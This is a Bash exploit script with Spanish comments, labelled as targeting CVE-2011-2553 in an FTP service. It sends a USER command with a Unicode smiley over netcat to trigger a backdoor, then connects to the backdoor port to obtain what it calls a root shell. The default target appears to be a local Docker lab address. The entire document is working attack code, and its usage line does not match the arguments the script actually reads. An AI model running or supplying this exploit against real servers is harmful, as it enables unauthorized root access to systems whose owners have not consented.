#!/bin/bash # Exploit para CVE-2011-2553 - FTP Service Vulnerability # Uso: ./exploit.sh [puerto_ftp] [puerto_backdoor] IP=${1:-172.17.0.2} FTP_PORT=${2:-21} BACKDOOR_PORT=${3:-5000} # Colores para output RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' NC='\033[0m' # No Color echo -e "${YELLOW}[*] Exploit para CVE-2011-2553 - FTP Service${NC}" echo -e "${YELLOW}[*] Objetivo: $IP${NC}" echo -e "${YELLOW}[*] Puerto FTP: $FTP_PORT${NC}" echo -e "${YELLOW}[*] Puerto Backdoor: $BACKDOOR_PORT${NC}" echo "" check_nc() { if ! command -v nc &> /dev/null; then echo -e "${RED}[!] Error: netcat no está instalado${NC}" echo "Instala con: apt-get install netcat" exit 1 fi } exploit_ftp() { echo -e "${YELLOW}[*] Conectando al servicio FTP en puerto $FTP_PORT...${NC}" # Enviar USER con smiley unicode U+263A { echo -e "USER \u263A" echo "PASS exploit" echo "QUIT" } | nc -w 5 $IP $FTP_PORT if [ $? -eq 0 ]; then echo -e "${GREEN}[+] Payload enviado al servicio FTP${NC}" else echo -e "${RED}[!] Error al conectar con el servicio FTP${NC}" exit 1 fi } connect_backdoor() { echo "" echo -e "${YELLOW}[*] Intentando conectar a la backdoor en puerto $BACKDOOR_PORT...${NC}" echo -e "${GREEN}[+] Si la explotación fue exitosa, deberías tener shell root${NC}" echo -e "${YELLOW}[*] Conectando...${NC}" echo "" nc -w 5 $IP $BACKDOOR_PORT || echo -e "${RED}[!] No se pudo conectar a la backdoor${NC}" } main() { echo -e "${YELLOW}[*] Iniciando explotación...${NC}" check_nc exploit_ftp echo -e "${YELLOW}[*] Esperando 2 segundos...${NC}" sleep 2 connect_backdoor } trap 'echo -e "\n${RED}[!] Explotación interrumpida${NC}"; exit 1' INT TERM if [ $# -eq 0 ]; then echo -e "${YELLOW}[*] Uso: $0 [puerto_ftp] [puerto_backdoor]${NC}" echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2 21 5000${NC}" echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2${NC}" exit 1 fi main